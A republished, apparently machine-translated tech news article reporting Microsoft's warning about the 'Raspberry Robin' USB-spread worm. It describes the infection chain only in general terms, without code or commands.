IT House July 3 news, in the field of network security, the struggle between the attacking and defending sides is eternal. Therefore, we often see loopholes or backdoors in a certain program, and some companies are attacked leading to data leakage, and even large companies such as Google, Apple, and Microsoft may have to resist countless network attacks every day.
Now, Microsoft has issued a warning that a high-risk worm is infecting hundreds of Windows corporate networks.
The malware, dubbed “Raspberry Robin,” spreads primarily through infected USB devices.
The infected USB device contained a .lnk file that, whenever the user clicked on it, Raspberry Robin automatically created a msiexec.exe process and launched another malicious file. It will then communicate with the command and control server via a short URL. If it successfully connects to the server, it downloads and installs a bunch of other malicious .dlls, which then try to connect with the TOR node.
IT Home has learned that “Raspberry Robin” is not a new kind of malware. The virus was spotted by multiple security experts as early as 2021, and Microsoft even saw evidence of its use in 2019.
According to Bleeping Computer, Microsoft is now privately notifying Defender for Endpoint subscribers about the dangers of the Raspberry Robin. Microsoft also noted that the worm has been found on hundreds of Windows networks across multiple divisions.
That is to say, although the attacker behind it successfully infected a large number of machines with this virus, he did not do anything to threaten users or exploit the vulnerability to obtain sensitive information and deploy ransomware.
Therefore, it is not clear which hacker group is responsible for these worms, nor what their ultimate purpose is. However, given the worm’s “evolutionary” potential and the fact that it is currently spreading fairly quickly, Microsoft has flagged it as a high-risk activity for now.
▲ Raspberry Robin infection process (Red Canary)
.
[related_posts_by_tax taxonomies=”post_tag”]
The post Microsoft warns: High-risk worm is gradually infecting a large number of Windows networks, called ‘Raspberry Robin’ – Programmer Sought appeared first on Gamingsym.